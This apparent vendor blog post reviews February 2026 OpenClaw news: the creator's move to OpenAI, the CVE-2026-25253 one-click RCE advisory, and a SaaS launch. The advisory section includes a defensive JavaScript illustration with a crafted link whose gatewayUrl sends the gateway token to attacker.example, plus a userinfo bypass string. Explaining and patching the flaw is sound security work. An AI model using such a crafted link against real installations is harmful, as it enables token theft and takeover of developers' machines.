February 2026 was the month when OpenClaw, the open-source AI Agent Framework with over 145,000 GitHub stars, faced three major events in a single month: the creator joining OpenAI, a serious security vulnerability, and the launch of a new SaaS service. This article summarizes all three events and analyzes the impact for organizations currently using or considering AI Agents.
1. Peter Steinberger, OpenClaw Creator, Joins OpenAI
On February 14, 2026, Peter Steinberger, the creator of OpenClaw (formerly Clawdbot → Moltbot → OpenClaw), announced that he would be joining OpenAI. Sam Altman, CEO of OpenAI, tweeted about the news:
"Peter Steinberger is joining OpenAI to drive the next generation of personal agents. He is a genius with a lot of amazing ideas about the future of very smart agents interacting with each other to do very useful things for people."
- Sam Altman, CEO of OpenAI
Steinberger himself explained his reasons on his personal blog:
- "I want to change the world, not build a large company" — Although he could have turned OpenClaw into a high-value company, he chose not to.
- "Teaming up with OpenAI is the fastest way to bring this to everyone"
- His new goal is to "build an agent that even my mum can use"
What Happens to OpenClaw?
OpenClaw will move to an independent Foundation, with OpenAI sponsoring the transition. Steinberger confirmed:
- The project will remain Open-Source permanently
- It will support AI Models from multiple providers, not just OpenAI
- The developer community will play an increasingly important role in setting direction
What Organizations Should Watch:
When the primary creator no longer directly maintains the project, the pace of development and direction of OpenClaw may change. Organizations using OpenClaw should monitor how the new Foundation is structured and whether there is a clear Roadmap.
2. Vulnerability CVE-2026-25253 — One-Click RCE (CVSS 8.8, High)
The most concerning news this month was the disclosure of a High-severity vulnerability in OpenClaw that lets an attacker take control of a developer's machine after a single click on a crafted link; no further interaction from the victim is needed.
| Detail | Information |
|---|---|
| CVE | CVE-2026-25253 |
| CVSS Score | 8.8 (High) |
| Discovered By | Oasis Security |
| Affected Versions | All versions before 2026.1.29 |
| Patched Version | Version 2026.1.29+ (recommended 2026.2.25+) |
| Attack Type | Cross-Site WebSocket Hijacking → Remote Code Execution |
How Does the Attack Work?
The vulnerability exists in OpenClaw's WebSocket system, which runs locally on the user's machine. Here's how the attack works:
- The attacker crafts a malicious link to the local Control UI containing a gatewayUrl parameter pointing to their own server
- The victim clicks the link; OpenClaw's Control UI automatically connects via WebSocket to the attacker's server, sending the stored gateway authentication token along with it
- The attacker uses the captured token to connect back to the victim's local gateway
- Once access is gained, the attacker can modify config, disable the sandbox, change tool policies, and execute arbitrary code
Steinberger himself explained:
"Control UI trusts gatewayUrl from the query string without validation and auto-connects on load, sending the stored gateway token... Clicking a crafted link can send the token to an attacker-controlled server."
- Peter Steinberger, OpenClaw Creator
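To make the mechanism concrete, here is an added illustration in JavaScript of the vulnerable pattern beside a hardened one. It is not OpenClaw's code and is not taken from the advisory. Only the gatewayUrl parameter name comes from the text above; the default gateway address ws://127.0.0.1:18789, the function names, the loopback-only policy, and the crafted sample link are assumptions made for this example. Nothing here opens a real socket; the "connect" step only reports where the stored token would be sent.

```javascript
// Added illustration, not OpenClaw's code. Assumed for this example:
// the default local gateway address, the function names, and the
// loopback-only policy. Only the "gatewayUrl" parameter name comes from
// the advisory text quoted above.
const DEFAULT_GATEWAY = "ws://127.0.0.1:18789"; // assumed default, not verified

// Vulnerable pattern: the page trusts whatever gatewayUrl the query string
// carries and would auto-connect (and send the stored token) to it.
function resolveGatewayUrlVulnerable(pageHref) {
  const params = new URL(pageHref).searchParams;
  return params.get("gatewayUrl") || DEFAULT_GATEWAY;
}

// Hardened check: accept a gateway override only if it is a WebSocket URL
// whose host is loopback. Parsing with URL (rather than string matching)
// defeats tricks such as "ws://127.0.0.1@attacker.example/", where the
// loopback address is only the userinfo part and the real host is remote.
// Caveat: "localhost" is accepted here for convenience; on a host where it
// resolves to something other than loopback, drop it from the allowlist.
function isAllowedGateway(candidate) {
  let u;
  try {
    u = new URL(candidate);
  } catch {
    return false; // unparsable input is never a valid gateway
  }
  if (u.protocol !== "ws:" && u.protocol !== "wss:") return false;
  const host = u.hostname.replace(/^\[|\]$/g, ""); // strip IPv6 brackets
  return host === "127.0.0.1" || host === "::1" || host === "localhost";
}

// Hardened pattern: ignore an untrusted override and fall back to the
// default gateway. A stricter UI would additionally require an explicit
// user confirmation before connecting anywhere but the default.
function resolveGatewayUrlHardened(pageHref) {
  const candidate = new URL(pageHref).searchParams.get("gatewayUrl");
  return candidate && isAllowedGateway(candidate) ? candidate : DEFAULT_GATEWAY;
}

// Simulates the auto-connect step without opening a socket: reports the
// target and whether the stored token would leave the local machine.
function simulateAutoConnect(pageHref, resolver) {
  const target = resolver(pageHref);
  return { target, tokenLeaves: !isAllowedGateway(target) };
}

// Constructed sample: a crafted link to the local Control UI that smuggles
// an attacker-controlled gatewayUrl (percent-encoded, as a real link would be).
const CRAFTED_LINK =
  "http://127.0.0.1:18789/?gatewayUrl=wss%3A%2F%2Fattacker.example%2Fws";

if (typeof require !== "undefined" && require.main === module) {
  console.log("vulnerable:", simulateAutoConnect(CRAFTED_LINK, resolveGatewayUrlVulnerable));
  console.log("hardened:  ", simulateAutoConnect(CRAFTED_LINK, resolveGatewayUrlHardened));
}
```

Run with node and the vulnerable resolver reports the attacker's host as the connect target with tokenLeaves set to true, while the hardened resolver stays on the default gateway. The design point is that the decision is made on a parsed URL's scheme and hostname, not on a substring match, because userinfo, unusual schemes, and bracketed IPv6 hosts all defeat naive string checks.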
Immediate Action Required:
- Update OpenClaw to version 2026.2.25 or later immediately, and confirm the installed version afterwards; any version before 2026.1.29 is vulnerable
- Rotate the gateway token and all other credentials previously used with OpenClaw; a token that may already have been captured is not protected by the patch
- Check logs for any suspicious WebSocket connections, in particular connections to or from hosts other than the local gateway
- Avoid clicking links from untrusted sources while OpenClaw is running, and treat a machine where a crafted link was opened on an unpatched version as potentially compromised
This is not the first security issue for OpenClaw this year. The Register previously reported that the OpenClaw ecosystem has been experiencing ongoing security problems, which organizations must weigh carefully before deploying it in production (Read more: Data Security in ERP Systems)
3. OpenClaw SaaS Launch — No Installation Required
On February 28, 2026, Clawbot AI launched the SaaS version of OpenClaw on clawbot.ai, providing a new option for those who don't want to install OpenClaw on their own machines.
Key Features of OpenClaw SaaS
| Feature | Details |
|---|---|
| Cloud Deployment | No local installation needed — use directly through a web browser |
| AI Model Selection | System automatically selects the appropriate AI model based on task type |
| Managed Infrastructure | Clawbot AI handles servers, updates, and security entirely |
| Deploy in Minutes | Set up agents quickly through the web interface |
SaaS vs Self-Hosted — Which to Choose?
| Aspect | Self-Hosted | SaaS (Clawbot.ai) |
|---|---|---|
| Data Control | Full control — data stays on your machine | Data on Clawbot's cloud |
| Setup Difficulty | Requires technical knowledge | Easy — use via web browser |
| Security | Self-managed (you must patch yourself) | Patching managed by Clawbot; you depend on their patch cadence and must trust them with your agent tokens and data |
| Best For | Developers, organizations needing data privacy | Beginners, teams wanting to experiment |
Besides Clawbot AI, major cloud providers like DigitalOcean have also launched One-Click Deploy services for OpenClaw, demonstrating that AI Agents are truly becoming mainstream.
OpenClaw 2.26 — Major Stability Update
Beyond the three major news items above, OpenClaw also released version 2.26, focusing on stability and security improvements:
- Claude Opus 4.6 support — Default model via Kilo Gateway
- External Secrets Management — More secure credential handling
- HTTP Security Headers — Added Strict-Transport-Security for HTTPS
- Session Cleanup — Disk usage controls to prevent storage overflow
- Multilingual Memory Embeddings — Better multi-language support
Lessons for Organizations — Key Considerations Before Using AI Agents
All the events in February reflect that AI Agents are still in a growth phase with high uncertainty. Organizations considering these tools should ask themselves:
- How sensitive is the data you're giving AI Agents access to? — CVE-2026-25253 shows that an agent running on a local machine, holding a token that grants control over that machine, is a realistic attack target. If the data is sensitive (e.g., financial data, employee records), the risk must be carefully assessed. (Read more: SQL Injection and Prevention)
- What is the Bus Factor of the project you're relying on? — OpenClaw was developed primarily by one person. When that person moves on, continuity becomes a question. Enterprise-grade software needs a clearly defined support team.
- Do you have a Patch Management process? — When new vulnerabilities emerge, how quickly can your organization update? (Read more: Disaster Recovery for Critical Systems)
AI Agent technology has high potential, but it must be used with understanding — not just "because it's trending" but with proper assessment of whether it's suitable for your organization, whether data is secure, and whether there's a contingency plan when problems arise.
- Saeree ERP Team
